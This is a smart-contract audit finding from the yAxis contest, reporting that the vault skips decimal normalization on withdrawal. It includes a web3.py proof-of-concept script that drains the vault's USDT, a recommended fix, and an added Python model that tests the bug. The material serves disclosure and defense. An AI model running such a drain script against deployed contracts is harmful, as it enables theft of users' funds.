code-423n4 / 2021-09-yaxis-findings


Vault does not normalize decimal on withdrawing #27

Closed code423n4 closed 2 years ago

code423n4 commented 3 years ago

Handle

jonah1005

Vulnerability details

Impact

The vault does not normalize decimals when a user withdraws the token. When a user has 100e18 shares, he can withdraw all USDC/USDT from the token.

The liquidity of USDC/USDC would be drained. I consider this a high-risk issue.

Proof of Concept

Vault.sol#L232-L261

This is the web3.py script to drain all usdt from the vault.

usdt_balance = usdt.functions.balanceOf(vault.address).call()
print('previous usdt:', usdt_balance)
# We deposit some margin dai to drain all liquidity.
deposit_amount = usdt_balance + usdt_balance
dai.functions.approve(vault.address, deposit_amount).transact()
vault.functions.deposit(dai.address, deposit_amount).transact()
print('amount of share:', vault.functions.balanceOf(user).call())
vault.functions.withdrawAll(usdt.address).transact()

# usdt balance would be left at zero
print('usdt left:', usdt.functions.balanceOf(vault.address).call())

Tools Used

None

Recommended Mitigation Steps

Normalize decimals on withdrawing.
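
The unit mismatch behind this report, as an added Python model that is not part of the original issue and is not the audited Vault.sol. The `ToyVault` class, its method names, the 18-decimal share accounting and all balances are assumptions constructed for illustration; it compares the withdrawal amount with and without normalization and includes an invariant a test suite can check.

```python
SHARE_DECIMALS = 18  # assumption: shares and internal accounting use 18 decimals

class ToyVault:
    """Constructed model of a multi-stablecoin vault; not the audited Vault.sol."""

    def __init__(self, token_decimals):
        self.decimals = dict(token_decimals)
        self.reserves = {t: 0 for t in token_decimals}  # raw token units held
        self.shares = {}
        self.total_shares = 0

    def _scale(self, token):
        return 10 ** (SHARE_DECIMALS - self.decimals[token])

    def total_value(self):
        # Sum of all reserves expressed in 18-decimal units.
        return sum(raw * self._scale(t) for t, raw in self.reserves.items())

    def deposit(self, user, token, raw):
        value = raw * self._scale(token)  # normalized on the way in
        total = self.total_value()
        minted = value if self.total_shares == 0 else value * self.total_shares // total
        self.reserves[token] += raw
        self.shares[user] = self.shares.get(user, 0) + minted
        self.total_shares += minted
        return minted

    def quote_withdraw(self, token, shares, normalize):
        # Claim in 18-decimal units, proportional to the share of supply.
        claim = shares * self.total_value() // self.total_shares
        # Bug modelled here: without the division, the 18-decimal claim is
        # used directly as a raw amount of a 6-decimal token.
        raw = claim // self._scale(token) if normalize else claim
        return claim, raw

    def value_conserved(self, token, shares, normalize):
        # Invariant for tests: the payout, re-normalized, must not exceed the claim.
        claim, raw = self.quote_withdraw(token, shares, normalize)
        return raw * self._scale(token) <= claim


def demo():
    vault = ToyVault({"DAI": 18, "USDT": 6})
    vault.deposit("lp", "USDT", 1_000_000 * 10**6)  # constructed balances
    minted = vault.deposit("user", "DAI", 100 * 10**18)
    _, fixed = vault.quote_withdraw("USDT", minted, normalize=True)
    _, buggy = vault.quote_withdraw("USDT", minted, normalize=False)
    return minted, fixed, buggy, vault
```

With normalization, 100e18 shares quote 100 USDT (100e6 raw units); without it the quote is 100e18 raw units, which exceeds the modelled reserve, and `value_conserved` returns `False`.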

gpersoon commented 2 years ago

Seems to be a duplicate of #73

GalloDaSballo commented 2 years ago

Duplicate of #131